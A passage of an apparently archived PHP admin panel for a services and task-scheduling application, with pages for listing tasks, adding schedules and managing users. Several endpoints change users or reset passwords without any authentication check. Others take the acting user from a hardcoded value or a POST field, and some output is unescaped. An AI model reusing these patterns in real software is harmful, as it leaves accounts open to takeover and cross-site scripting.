class="col-sm-9"> <input type="hidden" id="suburb" name="suburb" class="form-control" placeholder="Enter suburb"> </div> </div> <div class="form-group row"> <label for="city" class="col-sm-3 col-form-label">City:</label> <div class="col-sm-9"> <input type="text" id="city" name="city" class="form-control" placeholder="Enter city"> </div> </div> <div class="form-group row"> <label for="state" class="col-sm-3 col-form-label">State:</label> <div class="col-sm-9"> <input type="text" id="state" name="state" class="form-control" placeholder="Enter state"> </div> </div> <div class="form-group row"> <div class="col-sm-9"> <input type="hidden" id="postal_code" name="postal_code" class="form-control" placeholder="Enter postal code"> </div> </div> <div class="form-group row"> <div class="col-sm-9"> <input type="hidden" id="country" name="country" class="form-control" placeholder="Enter country"> </div> </div> <div class="form-group row"> <div class="col-sm-9"> <input type="hidden" id="latitude" name="latitude" class="form-control" placeholder="Enter latitude"> </div> </div> <div class="form-group row"> <div class="col-sm-9"> <input type="hidden" id="longitude" name="longitude" class="form-control" placeholder="Enter longitude"> </div> </div> </form> <div id="message" class="mt-3"></div> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button> <button type="submit" form="serviceForm" class="btn btn-primary">Add Service</button> </div> </div> </div> </div> <script> document.getElementById('serviceForm').addEventListener('submit', function(event) { event.preventDefault(); const formData = new FormData(this); fetch('submit_service.php', { method: 'POST', body: formData }) .then(response => response.text()) .then(data => { const messageDiv = document.getElementById('message'); messageDiv.textContent = data; messageDiv.classList.add('alert', 'alert-success'); Swal.fire({ title: 'Success!', text: data, icon: 'success', confirmButtonText: 'Ok' }).then(() => { location.reload(); }); document.getElementById('serviceForm').reset(); }) .catch(error => { const messageDiv = document.getElementById('message'); messageDiv.textContent = 'Error: ' + error; messageDiv.classList.add('alert', 'alert-danger'); Swal.fire({ title: 'Error!', text: error, icon: 'error', confirmButtonText: 'Ok' }); }); }); </script> <!-- continued from previous code snippet --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-body"> <table id="advanced_table" class="table"> <thead> <tr> <th>Name</th> <th>Region</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($services as $service): ?> <tr> <td><?php echo $service->name; ?></td> <td><?php echo $service->region; ?></td> <td> <a href="viewservice.php?id=<?php echo $System->encryptData($service->id); ?>" class="btn btn-success"> <i class="ik ik-eye text-white"></i> View </a> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> emeraadmin/report_tasksAssignedToUsers.php000064400000012050151676701240015111 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; // Create TaskService instance $taskService = new TaskService(); $System = new System(); // Assuming System class is correctly defined and used // Fetch all tasks categorized by assigned users $categorizedTasks = $taskService->getTasksAssignedToUsers(); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>Tasks Assigned to Users</h5> <span>List of all tasks categorized by assigned users</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">Assigned Tasks</li> </ol> </nav> </div> </div> </div> <?php foreach ($categorizedTasks as $userName => $tasks) { ?> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <?php if ( htmlspecialchars($userName) == null) { echo '<h3>Unassigned Tasks</h3>'; } else { echo '<h3>Tasks Assigned to ' . htmlspecialchars($userName) . '</h3>'; } ?> </div> <div class="card-body"> <div class="dt-responsive"> <table class="table" id="assigned_tasks_table_<?= strtolower(str_replace(' ', '_', $userName)); ?>"> <thead> <tr> <th>ID</th> <th>Service Name</th> <th>Status</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($tasks as $task) { ?> <tr> <td>TK-000<?= htmlspecialchars($task->id); ?></td> <td><?= htmlspecialchars($task->service_name); ?></td> <td> <?php if ($task->accepted) { echo '<span class="badge badge-success">Accepted</span>'; } elseif ($task->is_assigned && !$task->accepted) { echo '<span class="badge badge-warning">Pending</span>'; } else { echo '<span class="badge badge-danger">Not Assigned</span>'; } ?> </td> <td> <a href="viewtask.php?id=<?= $System->encryptData($task->id); ?>" class="btn btn-primary">View</a> <!-- Additional actions as needed --> </td> </tr> <?php } ?> </tbody> </table> </div> </div> </div> </div> </div> <?php } ?> </div> </div> <?php include('footer.php'); ?> <script> $(document).ready(function() { <?php foreach ($categorizedTasks as $userName => $tasks) { ?> $('#assigned_tasks_table_<?= strtolower(str_replace(' ', '_', $userName)); ?>').DataTable(); <?php } ?> }); </script> emeraadmin/submit_schedule.php000064400000001462151676701240012552 0ustar00<?php //$currentUser = $_SESSION['user_id']; $currentUser = 1; require_once '../../Classes/Schedules.php'; require_once '../../Service/ScheduleService.php'; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $schedule_name = $_POST['schedule-name']; $created_by = $currentUser; $updated_by = $currentUser; $completed = false; // Default value $created_at = date('Y-m-d H:i:s'); $updated_at = date('Y-m-d H:i:s'); $schedule = new Schedules(null, $schedule_name, $created_by, $completed, $created_at, $updated_at); $scheduleService = new ScheduleService(); if ($scheduleService->addSchedule($schedule)) { echo "Schedule added successfully!"; } else { echo "Failed to add schedule."; } } else { echo "Invalid request method."; } ?> emeraadmin/header.php000064400000016270151676701240010626 0ustar00<header class="header-top" header-theme="dark"> <div class="container-fluid"> <div class="d-flex justify-content-between"> <div class="top-menu d-flex align-items-center"> <button type="button" class="btn-icon mobile-nav-toggle d-lg-none"><span></span></button> <div class="header-search"> </div> <button type="button" id="navbar-fullscreen" class="nav-link"><i class="ik ik-maximize"></i></button> </div> <div class="top-menu d-flex align-items-center"> <!-- <div class="dropdown">--> <!--<!-- <a class="nav-link dropdown-toggle" href="#" id="notiDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><i class="ik ik-bell"></i><span class="badge bg-danger">3</span></a>-->--> <!-- <div class="dropdown-menu dropdown-menu-right notification-dropdown" aria-labelledby="notiDropdown">--> <!-- <h4 class="header">Notifications</h4>--> <!-- <div class="notifications-wrap">--> <!-- <a href="#" class="media">--> <!-- <span class="d-flex">--> <!-- <i class="ik ik-check"></i>--> <!-- </span>--> <!-- <span class="media-body">--> <!-- <span class="heading-font-family media-heading">Invitation accepted</span>--> <!-- <span class="media-content">Your have been Invited ...</span>--> <!-- </span>--> <!-- </a>--> <!-- <a href="#" class="media">--> <!-- <span class="d-flex">--> <!-- <img src="../../img/users/1.jpg" class="rounded-circle" alt="">--> <!-- </span>--> <!-- <span class="media-body">--> <!-- <span class="heading-font-family media-heading">Steve Smith</span>--> <!-- <span class="media-content">I slowly updated projects</span>--> <!-- </span>--> <!-- </a>--> <!-- <a href="#" class="media">--> <!-- <span class="d-flex">--> <!-- <i class="ik ik-calendar"></i>--> <!-- </span>--> <!-- <span class="media-body">--> <!-- <span class="heading-font-family media-heading">To Do</span>--> <!-- <span class="media-content">Meeting with Nathan on Friday 8 AM ...</span>--> <!-- </span>--> <!-- </a>--> <!-- </div>--> <!-- <div class="footer"><a href="javascript:void(0);">See all activity</a></div>--> <!-- </div>--> <!-- </div>--> <!-- <button type="button" class="nav-link ml-10 right-sidebar-toggle"><i class="ik ik-message-square"></i><span class="badge bg-success">3</span></button>--> <!-- <div class="dropdown">--> <!-- <a class="nav-link dropdown-toggle" href="#" id="menuDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><i class="ik ik-plus"></i></a>--> <!-- <div class="dropdown-menu dropdown-menu-right menu-grid" aria-labelledby="menuDropdown">--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Dashboard"><i class="ik ik-bar-chart-2"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Message"><i class="ik ik-mail"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Accounts"><i class="ik ik-users"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Sales"><i class="ik ik-shopping-cart"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Purchase"><i class="ik ik-briefcase"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Pages"><i class="ik ik-clipboard"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Chats"><i class="ik ik-message-square"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Contacts"><i class="ik ik-map-pin"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Blocks"><i class="ik ik-inbox"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Events"><i class="ik ik-calendar"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="Notifications"><i class="ik ik-bell"></i></a>--> <!-- <a class="dropdown-item" href="#" data-toggle="tooltip" data-placement="top" title="More"><i class="ik ik-more-horizontal"></i></a>--> <!-- </div>--> <!-- </div>--> <!-- <button type="button" class="nav-link ml-10" id="apps_modal_btn" data-toggle="modal" data-target="#appsModal"><i class="ik ik-grid"></i></button>--> <!-- <div class="dropdown">--> <!-- <a class="dropdown-toggle" href="#" id="userDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><img class="avatar" src="../../img/user.jpg" alt=""></a>--> <!-- <div class="dropdown-menu dropdown-menu-right" aria-labelledby="userDropdown">--> <!-- <a class="dropdown-item" href="#"><i class="ik ik-user dropdown-icon"></i> Profile</a>--> <!-- <a class="dropdown-item" href="#"><i class="ik ik-settings dropdown-icon"></i> Settings</a>--> <!-- <a class="dropdown-item" href="#"><span class="float-right"><span class="badge badge-primary">6</span></span><i class="ik ik-mail dropdown-icon"></i> Inbox</a>--> <!-- <a class="dropdown-item" href="#"><i class="ik ik-navigation dropdown-icon"></i> Message</a>--> <!-- <a class="dropdown-item" href="#"><i class="ik ik-power dropdown-icon"></i> Logout</a>--> <!-- </div>--> <!-- </div>--> </div> </div> </div> </header>emeraadmin/make_tasks_public.php000064400000002107151676701240013050 0ustar00<?php // Enable error reporting error_reporting(E_ALL); ini_set('display_errors', 1); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; if ($_SERVER['REQUEST_METHOD'] == 'POST') { $taskIds = explode(',', $_POST['taskIds']); $errors = []; foreach ($taskIds as $taskId) { // Create TaskService instance $taskService = new TaskService(); // Make the task public $result = $taskService->makeTaskPublic($taskId); if (!$result) { $errors[] = "Failed to make task ID: $taskId public"; } } if (empty($errors)) { $response = [ 'status' => 'success', 'taskIds' => implode(', ', $taskIds) ]; } else { $response = [ 'status' => 'error', 'message' => 'Some tasks could not be made public.', 'errors' => $errors ]; } header('Content-Type: application/json'); echo json_encode($response); } else { echo 'invalid_request'; } ?> emeraadmin/unacceptedtasks.php000064400000020053151676701240012551 0ustar00<?php include('head.php'); // Include database connection and TaskService class require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; $System = new System(); // Create TaskService instance $taskService = new TaskService(); // Initialize filters array $filters = []; // Check for filter inputs and add to the filters array if ($_SERVER['REQUEST_METHOD'] == 'GET') { if (!empty($_GET['service_name'])) { $filters['service_name'] = filter_input(INPUT_GET, 'service_name', FILTER_SANITIZE_STRING); } if (!empty($_GET['region'])) { $filters['region'] = filter_input(INPUT_GET, 'region', FILTER_SANITIZE_STRING); } if (!empty($_GET['frequency'])) { $filters['frequency'] = filter_input(INPUT_GET, 'frequency', FILTER_SANITIZE_STRING); } } // Fetch tasks from the database based on filters $tasks = $taskService->getAllUnacceptedTasks($filters); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Unaccepted Tasks</h5> <span>View all unaccepted tasks</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">View Tasks</li> </ol> </nav> </div> </div> </div> <!-- Search Form --> <div class="row mb-3"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <h3>Search Tasks</h3> </div> <div class="card-body"> <form method="GET" action=""> <div class="form-row"> <div class="form-group col-md-2"> <label for="service_name">Service Name</label> <input type="text" class="form-control" id="service_name" name="service_name" placeholder="Enter service name" value="<?php echo htmlspecialchars($_GET['service_name'] ?? ''); ?>"> </div> <div class="form-group col-md-2"> <label for="region">Region</label> <input type="text" class="form-control" id="region" name="region" placeholder="Enter region" value="<?php echo htmlspecialchars($_GET['region'] ?? ''); ?>"> </div> <div class="form-group col-md-2"> <label for="frequency">Frequency</label> <select class="form-control" id="frequency" name="frequency"> <option value="">Select</option> <option value="daily" <?php echo (isset($_GET['frequency']) && $_GET['frequency'] === 'daily') ? 'selected' : ''; ?>>Daily</option> <option value="3x/week" <?php echo (isset($_GET['frequency']) && $_GET['frequency'] === '3x/week') ? 'selected' : ''; ?>>3x/week</option> </select> </div> </div> <button type="submit" class="btn btn-primary">Apply Filters</button> <a href="unacceptedtasks.php" class="btn btn-secondary">Clear Filters</a> </form> </div> </div> </div> </div> <!-- End of Search Form --> <!-- Task viewing section --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"><h3>View Tasks</h3></div> <div class="card-body"> <table id="advanced_table" class="table"> <thead> <tr> <th>#</th> <th>Service Name</th> <th>Region</th> <th>Frequency</th> <th>Created By</th> <th>Created At</th> <th>Finished</th> <th>Assigned</th> <th>Assigned To</th> <th>Accepted</th> <th>Public Status</th> <th>Actions</th> </tr> </thead> <tbody> <?php if (!empty($tasks)): ?> <?php foreach ($tasks as $task): ?> <tr> <td><?php echo 'TSK-000'.htmlspecialchars($task->id); ?></td> <td><?php echo htmlspecialchars($task->service_name); ?></td> <td><?php echo htmlspecialchars($task->region); ?></td> <td><?php echo htmlspecialchars($task->frequency); ?></td> <td><?php echo htmlspecialchars($task->added_by_name); ?></td> <td><?php echo date('F j, Y, g:i a', strtotime($task->created_at)); ?></td> <td><?php echo ($task->finished ? '<label class="badge badge-success">Finished</label>' : '<label class="badge badge-danger">Not Finished</label>'); ?></td> <td><?php echo ($task->is_assigned ? '<label class="badge badge-success">Assigned</label>' : '<label class="badge badge-danger">Not Assigned</label>'); ?></td> <td><?php echo htmlspecialchars($task->assigned_to_name); ?></td> <th><?php echo ($task->accepted ? ' <label class="badge badge-success">Accepted</label>' : '<label class="badge badge-yellow">Not Accepted</label>'); ?></th> <td><label class="badge badge-<?php echo $task->isPublic ? 'yellow' : 'green'; ?>"><?php echo $task->isPublic ? 'Public' : 'Not Public'; ?></label></td> <td><a href="viewtask.php?id=<?php echo htmlspecialchars($System->encryptData($task->id)); ?>" class="btn btn-primary">View Details</a></td> </tr> <?php endforeach; ?> <?php else: ?> <tr> <td colspan="10">No tasks found.</td> </tr> <?php endif; ?> </tbody> </table> </div> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> emeraadmin/user_operations.php000064400000005276151676701240012623 0ustar00<?php ini_set('display_errors', 1); ini_set('display_startup_errors', 1); error_reporting(E_ALL); require_once '../../Service/UserService.php'; $userService = new UserService(); if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_POST['action'])) { switch ($_POST['action']) { case 'addUser': addUser($userService); break; case 'updateUser': updateUser($userService); break; case 'updatePassword': // Handle the updatePassword action resetPassword($userService); break; } } } elseif ($_SERVER['REQUEST_METHOD'] === 'DELETE') { if (isset($_GET['id'])) { deleteUser($userService, $_GET['id']); } } elseif ($_SERVER['REQUEST_METHOD'] === 'GET') { if (isset($_GET['id'])) { getUser($userService, $_GET['id']); } } elseif ($_SERVER['REQUEST_METHOD'] === 'PUT') { if (isset($_GET['id'])) { resetPassword($userService); } } function addUser($userService) { $firstName = $_POST['first_name']; $lastName = $_POST['last_name']; $email = $_POST['email']; $phone = $_POST['phone']; $password = $_POST['password']; $role = $_POST['role']; $status = 'active'; // Check if email already exists if ($userService->isEmailExists($email)) { echo json_encode(['status' => 'error', 'message' => 'Email already exists']); return; } $userService->addUser($firstName, $lastName, $email, $phone, $role, $status, $password); echo json_encode(['status' => 'success']); } function updateUser($userService) { $id = $_POST['id']; $firstName = $_POST['first_name']; $lastName = $_POST['last_name']; $email = $_POST['email']; $phone = $_POST['phone']; $role = $_POST['role']; // Check if email already exists for other users if ($userService->isEmailExistsForOthers($id, $email)) { echo json_encode(['status' => 'error', 'message' => 'Email already exists']); return; } $userService->updateUser($id, $firstName, $lastName, $email, $phone, $role); echo json_encode(['status' => 'success']); } function deleteUser($userService, $id) { $userService->deleteUser($id); echo json_encode(['status' => 'success']); } function getUser($userService, $id) { $user = $userService->getUserById($id); echo json_encode($user); } function resetPassword($userService) { $id = $_POST['user_id']; $password = $_POST['new-password']; $userService->resetPassword($id, $password); echo json_encode(['status' => 'success']); } ?> emeraadmin/viewusers2.php000064400000061046151676701240011515 0ustar00<?php include('head.php'); require_once '../../Service/UserService.php'; require_once '../../Classes/System.php'; $System = new System(); $userService = new UserService(); $users = $userService->getAllUsers(); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Users</h5> <span>View all users</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Users</a> </li> <li class="breadcrumb-item active" aria-current="page">View Users</li> </ol> </nav> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <button type="button" class="btn btn-primary" data-toggle="modal" data-target="#addUserModal"> <i class="ik ik-plus"></i> Add User </button> </div> </div> </div> </div> <!-- Add User Modal --> <div class="modal fade" id="addUserModal" tabindex="-1" role="dialog" aria-labelledby="addUserModalLabel" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="addUserModalLabel">Add New User</h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <form id="addUserForm"> <div class="form-group"> <label for="first_name">First Name:</label> <input type="text" class="form-control" id="first_name" name="first_name" required> </div> <div class="form-group"> <label for="last_name">Last Name:</label> <input type="text" class="form-control" id="last_name" name="last_name" required> </div> <div class="form-group"> <label for="email">Email:</label> <input type="email" class="form-control" id="email" name="email" required> </div> <div class="form-group"> <label for="phone">Phone:</label> <input type="text" class="form-control" id="phone" name="phone"> </div> <div class="form-group"> <label for="password">Password:</label> <input type="password" class="form-control" id="password" name="password" required> </div> <div class="form-group"> <label for="confirm_password">Confirm Password:</label> <input type="password" class="form-control" id="confirm_password" name="confirm_password" required> </div> <div class="form-group"> <label for="role">Role:</label> <select class="form-control" id="role" name="role" required> <option value="emera_admin">Emera Admin</option> <option value="subcontractor">Sub Contractor</option> <option value="task_provider">Task Provider</option> </select> </div> </form> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button> <button type="button" class="btn btn-primary" onclick="addUser()">Add User</button> </div> </div> </div> </div> <!-- Include this in your HTML file for the new edit modal --> <div class="modal fade" id="editUserModal2" tabindex="-1" role="dialog" aria-labelledby="editUserModal2Label" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="editUserModal2Label">Edit User</h5> <button type="button" class="close" aria-label="Close" onclick="closeModal('editUserModal2')"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <form id="editUserForm2"> <input type="hidden" id="edit_user_id" name="id"> <div class="form-group"> <label for="edit_first_name">First Name:</label> <input type="text" class="form-control" id="edit_first_name" name="first_name" required> </div> <div class="form-group"> <label for="edit_last_name">Last Name:</label> <input type="text" class="form-control" id="edit_last_name" name="last_name" required> </div> <div class="form-group"> <label for="edit_email">Email:</label> <input type="email" class="form-control" id="edit_email" name="email" required> </div> <div class="form-group"> <label for="edit_phone">Phone:</label> <input type="text" class="form-control" id="edit_phone" name="phone"> </div> <div class="form-group"> <label for="edit_role">Role:</label> <select class="form-control" id="edit_role" name="role" required> <option value="emera_admin">Emera Admin</option> <option value="subcontractor">Sub Contractor</option> <option value="task_provider">Task Provider</option> </select> </div> </form> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" onclick="closeModal('editUserModal2')">Close</button> <button type="button" class="btn btn-primary" onclick="updateUser()">Update User</button> </div> </div> </div> </div> <!-- update password--> <div class="modal fade" id="resetPasswordModal" tabindex="-1" role="dialog" aria-labelledby="resetPasswordModalLabel" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="resetPasswordModalLabel">Reset Password</h5> <button type="button" class="close" aria-label="Close" onclick="closeModal('resetPasswordModal')"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <form id="reset-password"> <input name="user_id" type="hidden"> <div class="form-group"> <label for="new-password">New Password:</label> <input type="password" class="form-control" name="new-password" required> </div> <div class="form-group"> <label for="confirm-password">Confirm Password:</label> <input type="password" class="form-control" name="confirm-password" required> </div> <div class="sign-btn text-center"> <button class="btn btn-theme" type="button" onclick="updatePassword()">Update Password</button> </div> <div id="reset-password-error" class="alert alert-danger d-none mt-3"></div> <div id="reset-password-success" class="alert alert-success d-none mt-3"></div> </form> </div> </div> </div> </div> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-body"> <div class="row mb-3"> <div class="col-md-3"> <label for="filter_name" class="form-label">Filter by Name:</label> <input type="text" class="form-control" id="filter_name"> </div> <div class="col-md-3"> <label for="filter_email" class="form-label">Filter by Email:</label> <input type="text" class="form-control" id="filter_email"> </div> <div class="col-md-3"> <label for="filter_role" class="form-label">Filter by Role:</label> <select class="form-control" id="filter_role"> <option value="">All Roles</option> <option value="emera_admin">Emera Admin</option> <option value="subcontractor">Sub Contractor</option> <option value="task_provider">Task Provider</option> </select> </div> <div class="col-md-3"> <label for="filter_status" class="form-label">Filter by Status:</label> <select class="form-control" id="filter_status"> <option value="">All Statuses</option> <option value="active.">Active</option> <option value="inactive">Inactive</option> </select> </div> </div> <table class="table" id="super_advanced_table"> <thead> <tr> <th>ID</th> <th>Name</th> <th>Email</th> <th>Phone</th> <th>Role</th> <th>Status</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($users as $user): ?> <tr> <td><?php echo 'U-000'.$user->id; ?></td> <td><?php echo $user->first_name . ' ' . $user->last_name; ?></td> <td><?php echo $user->email; ?></td> <td><?php echo $user->phone; ?></td> <td><?php echo '<span class="badge badge-'.($user->role === 'emera_admin' ? 'warning' : 'success') .'">'.ucfirst($user->role).'</span>'; ?></td> <td><?php echo '<span class="badge badge-'.($user->status === 'active' ? 'success' : 'danger').'">'.($user->status === 'active' ? 'Active.' : 'Inactive').'</span>'; ?></td> <td> <button type="button" class="btn btn-primary btn-sm" onclick="editUser(<?php echo $user->id; ?>)">Edit</button> <button type="button" class="btn btn-info btn-sm" onclick="editPassword(<?php echo $user->id; ?>)">Reset Password</button> <?php if ($user->status === 'active'): ?> <button type="button" class="btn btn-warning btn-sm" onclick="deActivateUser(<?php echo $user->id; ?>)">Deactivate</button> <?php else: ?> <button type="button" class="btn btn-success btn-sm" onclick="activateUser(<?php echo $user->id; ?>)">Activate</button> <?php endif; ?> </td> </tr> <?php endforeach; ?> </tbody> </table> </div> </div> </div> <script> $(document).ready(function () { var table = $('#super_advanced_table').DataTable({ // Configure initial settings if needed }); // Example filter for Name $('#filter_name').on('keyup', function () { table.column(1).search($(this).val()).draw(); }); // Example filter for Email $('#filter_email').on('keyup', function () { table.column(2).search($(this).val()).draw(); }); // Example filter for Role $('#filter_role').on('change', function () { var role = $(this).val(); table.column(4).search(role).draw(); }); // Example filter for Status $('#filter_status').on('change', function () { var status = $(this).val(); table.column(5).search(status).draw(); }); }); </script> </div> </div> </div> <?php include('footer.php'); ?> <!-- Include SweetAlert2 --> <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script> <script> function addUser() { const addUserForm = document.getElementById('addUserForm'); const formData = new FormData(addUserForm); // validate password const password = formData.get('password'); const confirmPassword = formData.get('confirm_password'); if (password !== confirmPassword) { Swal.fire('Error', 'Passwords do not match.', 'error'); return; } formData.append('action', 'addUser'); fetch('user_operations.php', { method: 'POST', body: formData }) .then(response => response.json()) .then(data => { if (data.status === 'success') { Swal.fire('Success', 'User added successfully!', 'success').then(() => { document.getElementById('addUserModal').classList.remove('show'); document.getElementById('addUserModal').style.display = 'none'; location.reload(); }); } else { Swal.fire('Error', data.message, 'error'); } }) .catch(error => { Swal.fire('Error', 'There was an error adding the user.', 'error'); console.error('Error:', error); }); } // Function to open the modal function openModal(modalId) { const modal = document.getElementById(modalId); modal.classList.add('show'); modal.style.display = 'block'; modal.removeAttribute('aria-hidden'); modal.setAttribute('aria-modal', 'true'); // Add backdrop manually const backdrop = document.createElement('div'); backdrop.className = 'modal-backdrop fade show'; backdrop.id = 'backdrop'; document.body.appendChild(backdrop); } // Function to close the modal function closeModal(modalId) { const modal = document.getElementById(modalId); modal.classList.remove('show'); modal.style.display = 'none'; modal.setAttribute('aria-hidden', 'true'); modal.removeAttribute('aria-modal'); // Remove the backdrop manually const backdrop = document.getElementById('backdrop'); if (backdrop) { backdrop.remove(); } } // Function to edit user function editUser(userId) { fetch(`user_operations.php?id=${userId}`) .then(response => response.json()) .then(data => { console.log('Server response:', data); // Log the response for debugging const editUserForm = document.getElementById('editUserForm2'); editUserForm.querySelector('#edit_user_id').value = data.id; editUserForm.querySelector('#edit_first_name').value = data.first_name; editUserForm.querySelector('#edit_last_name').value = data.last_name; editUserForm.querySelector('#edit_email').value = data.email; editUserForm.querySelector('#edit_phone').value = data.phone; editUserForm.querySelector('#edit_role').value = data.role; // Show the modal openModal('editUserModal2'); }) .catch(error => { Swal.fire('Error', 'There was an error fetching user data.', 'error'); console.error('Error fetching user data:', error); }); } // Function to update user function updateUser() { const editUserForm = document.getElementById('editUserForm2'); const formData = new FormData(editUserForm); formData.append('action', 'updateUser'); fetch('user_operations.php', { method: 'POST', body: formData }) .then(response => response.json()) .then(data => { if (data.status === 'success') { Swal.fire('Success', 'User updated successfully!', 'success').then(() => { closeModal('editUserModal2'); location.reload(); }); } else { Swal.fire('Error', data.message, 'error'); } }) .catch(error => { Swal.fire('Error', 'There was an error updating the user.', 'error'); console.error('Error:', error); }); } function activateUser(userId) { Swal.fire({ title: 'Are you sure?', text: "You want to activate this user?", icon: 'warning', showCancelButton: true, confirmButtonText: 'Yes, activate!', cancelButtonText: 'Cancel' }).then((result) => { fetch(`user_operations.php?id=${userId}`, { method: 'DELETE' }) .then(response => response.json()) .then(data => { console.log('Server response:', data); // Log the response for debugging if (data.status === 'success') { Swal.fire('Deleted!', 'User has been activated.', 'success').then(() => { location.reload(); }); } }) .catch(error => { Swal.fire('Error', 'There was an error activating the user.', 'error'); console.error('Error:', error); }); }); } function deActivateUser(userId) { Swal.fire({ title: 'Are you sure?', text: "You want to deactivate this user?", icon: 'warning', showCancelButton: true, confirmButtonText: 'Yes, deactivate!', cancelButtonText: 'Cancel' }).then((result) => { console.log('Result:', result); if (result.isConfirmed) { fetch(`user_operations.php?id=${userId}`, { method: 'DELETE' }) .then(response => response.json()) .then(data => { console.log('Server response:', data); // Log the response for debugging if (data.status === 'success') { Swal.fire('Deactivated!', 'User has been deactivated.', 'success').then(() => { location.reload(); }); } }) .catch(error => { Swal.fire('Error', 'There was an error deactivating the user.', 'error'); console.error('Error:', error); }); } }); } //edit password button function editPassword(userId) { const resetPasswordForm = document.getElementById('reset-password'); resetPasswordForm.querySelector('input[name="user_id"]').value = userId; openModal('resetPasswordModal'); } // Function to update password function updatePassword() { const resetPasswordForm = document.getElementById('reset-password'); const formData = new FormData(resetPasswordForm); const newPassword = formData.get('new-password'); const confirmPassword = formData.get('confirm-password'); if (newPassword !== confirmPassword) { Swal.fire('Error', 'Passwords do not match.', 'error'); return; } formData.append('action', 'updatePassword'); fetch('user_operations.php', { method: 'POST', body: formData }) .then(response => response.json()) .then(data => { if (data.status === 'success') { Swal.fire('Success', 'Password updated successfully!', 'success').then(() => { closeModal('resetPasswordModal'); }).then(() => { location.reload(); }); } else { Swal.fire('Error', data.message, 'error'); } }) .catch(error => { Swal.fire('Error', 'There was an error updating the password.', 'error'); console.error('Error:', error); }); } </script> emeraadmin/submit_task.php000064400000001716151676701240011722 0ustar00<?php //$currentUser = $_SESSION['user_id']; require_once '../../Classes/Task.php'; require_once '../../Service/TaskService.php'; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $schedule_id = $_POST['schedule-id']; $service_id = $_POST['service-id']; $frequency = $_POST['frequency']; $dates = $_POST['dates']; $currentUser = $_POST['current-user']; $added_by = $currentUser; $updated_by = $currentUser; $created_at = date('Y-m-d H:i:s'); $updated_at = date('Y-m-d H:i:s'); $taskService = new TaskService(); $task = new 